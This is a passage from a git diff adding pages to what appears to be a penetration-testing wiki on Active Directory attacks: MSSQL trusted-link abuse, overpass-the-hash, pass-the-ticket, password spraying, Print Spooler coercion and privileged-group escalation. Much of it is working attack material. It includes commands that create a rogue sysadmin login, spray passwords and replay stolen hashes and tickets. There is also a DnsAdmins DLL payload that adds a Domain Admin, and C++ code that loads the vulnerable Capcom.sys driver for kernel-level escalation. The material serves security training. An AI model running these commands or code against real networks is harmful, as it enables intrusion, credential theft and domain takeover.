+Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
+
+#Try to escalate privileges on an instance
+Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"
+```
+
+### Metasploit
+
+You can easily check for trusted links using metasploit.
+
+```bash
+#Set username, password, windows auth (if using AD), IP...
+msf> use exploit/windows/mssql/mssql_linkcrawler
+[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
+```
+
+Notice that metasploit will try to abuse only the `openquery()` function in MSSQL \(so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.\)
+
+### Manual - Openquery\(\)
+
+From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
+
+```bash
+select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')')
+```
+
+From Windows you could also find the links and execute commands manually using a MSSQL client like [HeidiSQL](https://www.heidisql.com/)
+
+_Login using Windows authentication:_
+
+![](../../.gitbook/assets/image%20%28289%29.png)
+
+_Find links inside the accessible MSSQL server \(in this case the link is to dcorp-sql1\):_  
+`select * from master..sysservers`
+
+![](../../.gitbook/assets/image%20%28315%29.png)
+
+Execute queries through the link \(example: find more links in the new accessible instance\):  
+`select * from openquery("dcorp-sql1", 'select * from master..sysservers')`
+
+![](../../.gitbook/assets/image%20%28298%29.png)
+
+You can continue these trusted links chain forever manually.
+
+Some times you won't be able to perform actions like `exec xp_cmdshell` from `openquery()` in those cases it might be worth it to test the following method:
+
+### Manual - EXECUTE
+
+You can also abuse trusted links using EXECUTE:
+
+```bash
+#Create user and give admin privileges
+EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+```
+
+
+
diff --git a/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md
new file mode 100644
index 00000000..301b566e
--- /dev/null
+++ b/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -0,0 +1,29 @@
+# Over Pass the Hash/Pass the Key
+
+## Overpass The Hash/Pass The Key \(PTK\)
+
+This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.
+
+In order to perform this attack, the **NTLM hash \(or password\) of the target user account is needed**. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to **access** any service or machine **where the user account has permissions**.
+
+```text
+python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
+export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
+python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
+```
+
+You can **specify** `-aesKey [AES key]` to specify to use **AES256**.   
+You can also use the ticket with other tools like: as smbexec.py or wmiexec.py
+
+Possible problems:
+
+* _PyAsn1Error\(‘NamedTypes can cast only scalar values’,\)_ : Resolved by updating impacket to the lastest version.
+* _KDC can’t found the name_ : Resolved by using the hostname instead of the IP address, because it was not recognized by Kerberos KDC.
+
+```text
+.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
+.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
+```
+
+This kind of attack is similar to Pass the Key, but instead of using hashes to request for a ticket, the ticket itself is stolen and used to authenticate as its owner.
+
diff --git a/windows/active-directory-methodology/pass-the-ticket.md b/windows/active-directory-methodology/pass-the-ticket.md
new file mode 100644
index 00000000..dfd656cc
--- /dev/null
+++ b/windows/active-directory-methodology/pass-the-ticket.md
@@ -0,0 +1,43 @@
+# Pass the Ticket
+
+## Pass The Ticket \(PTT\)
+
+This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
+
+**Read**:
+
+* [Harvesting tickets from Windows](../../pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
+* [Harvesting tickets from Linux](../../pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
+
+### **Swaping Linux and Windows tickets between platforms**
+
+The [ticket\_converter](https://github.com/Zer1t0/ticket_converter) script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:
+
+```text
+root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
+Converting ccache => kirbi
+root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
+Converting kirbi => ccache
+```
+
+[Kekeo](https://github.com/gentilkiwi/kekeo), to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.
+
+### Pass The Ticket Attack
+
+{% code title="Linux" %}
+```bash
+export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 
+python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
+```
+{% endcode %}
+
+{% code title="Windows" %}
+```bash
+#Load the ticket in memory using mimikatz or Rubeus
+mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
+.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
+klist #List tickets in cache to cehck that mimikatz has loaded the ticket
+.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
+```
+{% endcode %}
+
diff --git a/windows/active-directory-methodology/password-spraying.md b/windows/active-directory-methodology/password-spraying.md
new file mode 100644
index 00000000..63f73ba6
--- /dev/null
+++ b/windows/active-directory-methodology/password-spraying.md
@@ -0,0 +1,78 @@
+# Password Spraying
+
+## **Password Spraying**
+
+Once you have found several **valid usernames** you can try the most **common passwords** \(keep in mind the password policy of the environment\) with each of the discovered users.  
+By **default** the **minimum** **password** **length** is **7**.
+
+Lists of common usernames could also be useful: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
+
+Notice that you **could lockout some accounts if you try several wrong passwords** \(by default more than 10\).
+
+### Get password policy
+
+If you have some user credentials or a shell as a domain user you can get the password policy with:
+
+* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
+* `enum4linx -u 'username' -p 'password' -P <IP>`
+* `(Get-DomainPolicy)."System Access" #From powerview`
+
+### Exploitation
+
+Using **crackmapexec:**
+
+```bash
+crackmapexec smb <IP> -u users.txt -p passwords.txt
+```
+
+Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)\(python\) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
+
+```bash
+python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
+python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
+```
+
+**Kerbrute** also tells if a username is valid.
+
+Using [kerbrute](https://github.com/ropnop/kerbrute)\(Go\)
+
+```bash
+./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
+./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
+```
+
+With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
+
+```bash
+# with a list of users
+.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
+
+# check passwords for all users in current domain
+.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
+```
+
+With the `scanner/smb/smb_login` module of Metasploit:
+
+![](../../.gitbook/assets/image%20%28234%29.png)
+
+With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
+
+```bash
+Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
+```
+
+or **spray** \(read next section\).
+
+### Lockout check
+
+The best way is not to try with more than 5/7 passwords per account.
+
+So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use _**spray:**_
+
+```bash
+apt-get install spray
+spray -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPe
+```
+
+\*\*\*\*[**More information and rudimentary password spray techniques in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)\*\*\*\*
+
diff --git a/windows/active-directory-methodology/printers-spooler-service-abuse.md b/windows/active-directory-methodology/printers-spooler-service-abuse.md
new file mode 100644
index 00000000..0cd6cdc4
--- /dev/null
+++ b/windows/active-directory-methodology/printers-spooler-service-abuse.md
@@ -0,0 +1,57 @@
+# Printers Spooler Service abuse
+
+If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.  
+Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
+
+### Finding Windows Servers on the domain
+
+Using Powershell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
+
+```bash
+Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
+```
+
+### Finding Spooler services listening
+
+Using a slightly modified @mysmartlogin's \(Vincent Le Toux's\) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
+
+```bash
+. .\Get-SpoolStatus.ps1
+ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
+```
+
+You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
+
+```bash
+rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
+```
+
+### Ask the service to authenticate against an arbitrary host
+
+You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
+
+```bash
+SpoolSample.exe <TARGET> <RESPONDERIP>
+```
+
+or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket)  or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
+
+```bash
+python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
+printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
+```
+
+### Combining with Unconstrained Delegation
+
+If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it \([Pass the Ticket](pass-the-ticket.md)\). 
+
+### NTLMv1 attack
+
+Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't **abuse a Print Spooler service** configured.
+
+You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 112233445566778899**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.  
+If you are using `responder` you could try to **use the flag `--lm`** to try to **downgrade** the **authentication**.  
+_Note that for this technique the authentication must be performed using NTLMv1 \(NTLMv2 is not valid\)._
+
+Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** \([more info here](../ntlm/#ntlmv1-challenge)\), so using some services specially dedicated to cracking DES you will be able to crack it \(you could use [https://crack.sh/](https://crack.sh/) for example\).
+
diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
new file mode 100644
index 00000000..2a1a6f9b
--- /dev/null
+++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
@@ -0,0 +1,378 @@
+# Privileged Accounts and Token Privileges
+
+## Known groups with administration privileges
+
+* **Administrators**
+* **Domain Admins**
+* **Enterprise Admins**
+
+There are other account memberships and access token privileges that can also be useful during security assessments when chaining multiple attack vectors.
+
+## AdminSDHolder  group
+
+The Access Control List \(ACL\) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.  
+By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group \(in an hour\).  
+And if someone tries to delete this user from the Domain Admins \(for example\) in an hour or less, the user will be back in the group.
+
+Add a user to the **AdminSDHolder** group:
+
+```csharp
+Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
+```
+
+Check if the user is inside the **Domain Admins** group:
+
+```text
+Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
+```
+
+If you don't want to wait an hour you can use a PS script to make the restore happen instantly: [https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1)
+
+\*\*\*\*[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)\*\*\*\*
+
+## Account Operators <a id="account-operators"></a>
+
+* Allows creating non administrator accounts and groups on the domain
+* Allows logging in to the DC locally
+
+Note the spotless' user membership:
+
+![](../../.gitbook/assets/a1.png)
+
+However, we can still add new users:
+
+![](../../.gitbook/assets/a2.png)
+
+As well as login to DC01 locally:
+
+![](../../.gitbook/assets/a3.png)
+
+## Server Operators <a id="server-operators"></a>
+
+This membership allows users to configure Domain Controllers with the following privileges:
+
+* Allow log on locally
+* Back up files and directories
+* Change the system time
+* Change the time zone
+* Force shutdown from a remote system
+* Restore files and directories
+* Shut down the system
+
+Note how we cannot access files on the DC with current membership:
+
+![](../../.gitbook/assets/a4.png)
+
+However, if the user belongs to `Server Operators`:
+
+![](../../.gitbook/assets/a5.png)
+
+The story changes:
+
+![](../../.gitbook/assets/a6.png)
+
+## Backup Operators <a id="backup-operators"></a>
+
+As with `Server Operators` membership, we can access the `DC01` file system if we belong to `Backup Operators`:
+
+![](../../.gitbook/assets/a7.png)
+
+## DnsAdmins
+
+### Resume
+
+A user who is member of the **DNSAdmins** group or have **write privileges to a DNS** server object can load an **arbitrary DLL** with **SYSTEM** privileges on the **DNS server**.  
+This is really interesting as the **Domain Controllers** are used very frequently as DNS servers.
+
+### Execute
+
+Then, if you have a user inside the DNSAdmins group, you can make the DNS server load an arbitrary DLL with SYSTEM privileges. You can make the DNS server load a local or remote \(shared by SMB\) DLL file executing:
+
+```text
+dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
+dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
+```
+
+An example of a valid DLL can be found in [https://github.com/kazkansouh/DNSAdmin-DLL](https://github.com/kazkansouh/DNSAdmin-DLL). I would change the code of the function `DnsPluginInitialize`  to something like:
+
+```c
+DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
+{
+		system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
+		system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
+}
+```
+
+So, when the **DNSservice** start or restart, a new user will be created.
+
+Even having a user inside DNSAdmin group you **by default cannot stop and restart the DNS service.** But you can always try doing:
+
+```csharp
+sc.exe \\dc01 stop dns
+sc.exe \\dc01 start dns
+```
+
+\*\*\*\*[**Learn more about this privilege escalation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise)
+
+## **AD Recycle Bin**
+
+This group gives you permission to read deleted AD object. Something juicy information can be found in there:
+
+```bash
+#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
+#You need to be in the "AD Recycle Bin" group of the AD to list the deleted AD objects
+Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
+```
+
+## Group Managed Service Accounts \(gMSA\)
+
+ In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced  **Managed Service Accounts:**
+
+* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. 
+  * It is uses Microsoft Key Distribution Service \(KDC\) to create and manage the passwords for the gMSA.
+* It cannot be lock out or use for interactive login
+* Supports to share across multiple hosts
+* Can use to run schedule tasks \(Managed service accounts do not support to run schedule tasks\)
+* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.
+
+ gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.
+
+![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)
+
+So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.
+
+Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
+
+## SeLoadDriverPrivilege <a id="seloaddriverprivilege"></a>
+
+A very dangerous privilege to assign to any user - it allows the user to load kernel drivers and execute code with kernel privilges aka `NT\System`. See how `offense\spotless` user has this privilege:
+
+![](../../.gitbook/assets/a8.png)
+
+`Whoami /priv` shows the privilege is disabled by default:
+
+![](../../.gitbook/assets/a9.png)
+
+However, the below code allows enabling that privilege fairly easily:
+
+{% code title="privileges.cpp" %}
+```c
+#include "stdafx.h"
+#include <windows.h>
+#include <stdio.h>
+
+int main()
+{
+	TOKEN_PRIVILEGES tp;
+	LUID luid;
+	bool bEnablePrivilege(true);
+	HANDLE hToken(NULL);
+	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
+
+	if (!LookupPrivilegeValue(
+		NULL,            // lookup privilege on local system
+		L"SeLoadDriverPrivilege",   // privilege to lookup 
+		&luid))        // receives LUID of privilege
+	{
+		printf("LookupPrivilegeValue error: %un", GetLastError());
+		return FALSE;
+	}
+	tp.PrivilegeCount = 1;
+	tp.Privileges[0].Luid = luid;
+	
+	if (bEnablePrivilege) {
+		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	}
+	
+	// Enable the privilege or disable all privileges.
+	if (!AdjustTokenPrivileges(
+		hToken,
+		FALSE,
+		&tp,
+		sizeof(TOKEN_PRIVILEGES),
+		(PTOKEN_PRIVILEGES)NULL,
+		(PDWORD)NULL))
+	{
+		printf("AdjustTokenPrivileges error: %x", GetLastError());
+		return FALSE;
+	}
+
+	system("cmd");
+    return 0;
+}
+```
+{% endcode %}
+
+We compile the above, execute and the privilege `SeLoadDriverPrivilege` is now enabled:
+
+![](../../.gitbook/assets/a10.png)
+
+### Capcom.sys Driver Exploit <a id="capcom-sys-driver-exploit"></a>
+
+To further prove the `SeLoadDriverPrivilege` is dangerous, let's **exploit it to elevate privileges**.
+
+You can load a new driver using  **NTLoadDriver:**
+
+```cpp
+NTSTATUS NTLoadDriver(
+  _In_ PUNICODE_STRING DriverServiceName
+);
+```
+
+By default the driver service name should be under `\Registry\Machine\System\CurrentControlSet\Services\`
+
+But, according with to the **documentation** you **could** also **use** paths under **HKEY\_CURRENT\_USER**, so you could **modify** a **registry** there to **load arbitrary drivers** on the system.  
+The relevant parameters that must be defined in the new registry are:
+
+* **ImagePath:** REG\_EXPAND\_SZ type value which specifies the driver path. In this context, the path should be a directory with modification permissions by the non-privileged user.
+* **Type**: Value of type REG\_WORD in which the type of the service is indicated. For our purpose, the value should be defined as SERVICE\_KERNEL\_DRIVER \(0x00000001\).
+
+Therefore you could create a new registry in **`\Registry\User\<User-SID>\System\CurrentControlSet\MyService`** indicating in **ImagePath** the path to the driver and in **Type** the with value 1 and use those values on the exploit \(you can obtain the User SID using: `Get-ADUser -Identity 'USERNAME' | select SID` or `(New-Object System.Security.Principal.NTAccount("USERNAME")).Translate([System.Security.Principal.SecurityIdentifier]).value`
+
+```bash
+PCWSTR pPathSource = L"C:\\experiments\\privileges\\Capcom.sys";
+PCWSTR pPathSourceReg = L"\\Registry\\User\\<User-SID>\\System\\CurrentControlSet\\MyService";
+```
+
+The first one declares a string variable indicating where the vulnerable **Capcom.sys** driver is located on the victim system and the second one is a string variable indicating a service name that will be used \(could be any service\).  
+Note, that the **driver must be signed by Windows** so you cannot load arbitrary drivers. But, **Capcom.sys** **can be abused to execute arbitrary code and is signed by Windows**, so the goal is to load this driver and exploit it.
+
+ Load the driver:
+
+```c
+#include "stdafx.h"
+#include <windows.h>
+#include <stdio.h>
+#include <ntsecapi.h>
+#include <stdlib.h>
+#include <locale.h>
+#include <iostream>
+#include "stdafx.h"
+
+NTSTATUS(NTAPI *NtLoadDriver)(IN PUNICODE_STRING DriverServiceName);
+VOID(NTAPI *RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
+NTSTATUS(NTAPI *NtUnloadDriver)(IN PUNICODE_STRING DriverServiceName);
+
+int main()
+{
+	TOKEN_PRIVILEGES tp;
+	LUID luid;
+	bool bEnablePrivilege(true);
+	HANDLE hToken(NULL);
+	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
+
+	if (!LookupPrivilegeValue(
+		NULL,            // lookup privilege on local system
+		L"SeLoadDriverPrivilege",   // privilege to lookup 
+		&luid))        // receives LUID of privilege
+	{
+		printf("LookupPrivilegeValue error: %un", GetLastError());
+		return FALSE;
+	}
+	tp.PrivilegeCount = 1;
+	tp.Privileges[0].Luid = luid;
+	
+	if (bEnablePrivilege) {
+		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	}
+	
+	// Enable the privilege or disable all privileges.
+	if (!AdjustTokenPrivileges(
+		hToken,
+		FALSE,
+		&tp,
+		sizeof(TOKEN_PRIVILEGES),
+		(PTOKEN_PRIVILEGES)NULL,
+		(PDWORD)NULL))
+	{
+		printf("AdjustTokenPrivileges error: %x", GetLastError());
+		return FALSE;
+	}
+
+	//system("cmd");
+	// below code for loading drivers is taken from https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/RDI/dll/NtLoadDriver.h
+	std::cout << "[+] Set Registry Keys" << std::endl;
+	NTSTATUS st1;
+	UNICODE_STRING pPath;
+	UNICODE_STRING pPathReg;
+	PCWSTR pPathSource = L"C:\\experiments\\privileges\\Capcom.sys";
+  PCWSTR pPathSourceReg = L"\\Registry\\User\\<User-SID>\\System\\CurrentControlSet\\MyService";
+	const char NTDLL[] = { 0x6e, 0x74, 0x64, 0x6c, 0x6c, 0x2e, 0x64, 0x6c, 0x6c, 0x00 };
+	HMODULE hObsolete = GetModuleHandleA(NTDLL);
+	*(FARPROC *)&RtlInitUnicodeString = GetProcAddress(hObsolete, "RtlInitUnicodeString");
+	*(FARPROC *)&NtLoadDriver = GetProcAddress(hObsolete, "NtLoadDriver");
+	*(FARPROC *)&NtUnloadDriver = GetProcAddress(hObsolete, "NtUnloadDriver");
+
+	RtlInitUnicodeString(&pPath, pPathSource);
+	RtlInitUnicodeString(&pPathReg, pPathSourceReg);
+	st1 = NtLoadDriver(&pPathReg);
+	std::cout << "[+] value of st1: " << st1 << "\n";
+	if (st1 == ERROR_SUCCESS) {
+		std::cout << "[+] Driver Loaded as Kernel..\n";
+		std::cout << "[+] Press [ENTER] to unload driver\n";
+	}
+
+	getchar();
+	st1 = NtUnloadDriver(&pPathReg);
+	if (st1 == ERROR_SUCCESS) {
+		std::cout << "[+] Driver unloaded from Kernel..\n";
+		std::cout << "[+] Press [ENTER] to exit\n";
+		getchar();
+	}
+
+    return 0;
+}
+```
+
+Once the above code is compiled and executed, we can see that our malicious `Capcom.sys` driver gets loaded onto the victim system:
+
+![](../../.gitbook/assets/a11.png)
+
+Download: [Capcom.sys - 10KB](https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LTyWsUdKa48PyMRyZ4I%2F-LTyZ9IkoofuWRxlNpUG%2FCapcom.sys?alt=media&token=e4417fb3-f2fd-42ef-9000-d410bc6ceb54)
+
+**No it's time to abuse the loaded driver to execute arbitrary code.**
+
+You can download exploits from [https://github.com/tandasat/ExploitCapcom](https://github.com/tandasat/ExploitCapcom) and [https://github.com/zerosum0x0/puppetstrings](https://github.com/zerosum0x0/puppetstrings) and execute it on the system to elevate our privileges to `NT Authority\System`:
+
+![](../../.gitbook/assets/a12.png)
+
+### Auto
+
+You can use [https://github.com/TarlogicSecurity/EoPLoadDriver/](https://github.com/TarlogicSecurity/EoPLoadDriver/) to **automatically enable** the **privilege**, **create** the **registry key** under HKEY\_CURRENT\_USER and **execute NTLoadDriver** indicating the registry key that you want to create and the path to the driver:
+
+![](../../.gitbook/assets/image%20%2845%29.png)
+
+Then, you will need to download a **Capcom.sys** exploit and use it to escalate privileges.
+
+## References <a id="references"></a>
+
+{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}
+
+{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
+
+{% embed url="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" %}
+
+{% embed url="https://docs.microsoft.com/en-us/windows/desktop/secauthz/enabling-and-disabling-privileges-in-c--" %}
+
+{% embed url="https://adsecurity.org/?p=3658" %}
+
+{% embed url="http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" %}
+
+{% embed url="https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/" %}
+
+{% embed url="https://rastamouse.me/2019/01/gpo-abuse-part-1/" %}
+
+{% embed url="https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/EXE/NtLoadDriver-C%2B%2B/ntloaddriver.cpp\#L13" %}
+
+{% embed url="https://github.com/tandasat/ExploitCapcom" %}
+
+{% embed url="https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp" %}
+
+{% embed url="https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys" %}
+
+{% embed url="https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e" %}
+
+{% embed url="https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html" %}
+
+
+
diff --git a/windows/active-directory-methodology/resource-based-constrained-delegation.md b/windows/active-directory-methodology/resource-based-constrained-delegation.md
new file mode 100644
index 00000000..bb43356a
--- /dev/null
+++ b/windows/active-directory-methodology/resource-based-constrained-delegation.md
@@ -0,0 +1,105 @@
+# Resource-based Constrained Delegation
+
+## Basics of Resource-based Constrained Delegation
+
+This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
+
+In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
+
+Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** \(_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_\) ****can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ \(In the other forms of Delegation you needed domain admin privs\).
+
+### New Concepts
+
+Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation**_ flag inside the _userAccountControl_  value of the user is needed to perform a **S4U2Self.** But that's not completely truth.  
+The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** \(have a SPN\) but, if you **have** _**TrustedToAuthForDelegation**_  the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
+
+However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** \(this is not a vulnerability, it's a feature, apparently\).
+
+### Attack structure
+
+> If you have **write equivalent privileges** over a **Computer** account you can obtain **privileged access** in that machine.
+
+Suppose that the attacker has already **write equivalent privileges over the victim computer**.
+
+1. The attacker **compromises** an account that has a **SPN** or **creates one** \(“Service A”\). Note that **any** _Admin User_ without any other special privilege can **create** up ****until 10 **Computer objects \(**_**MachineAccountQuota**_**\)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
+2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. 
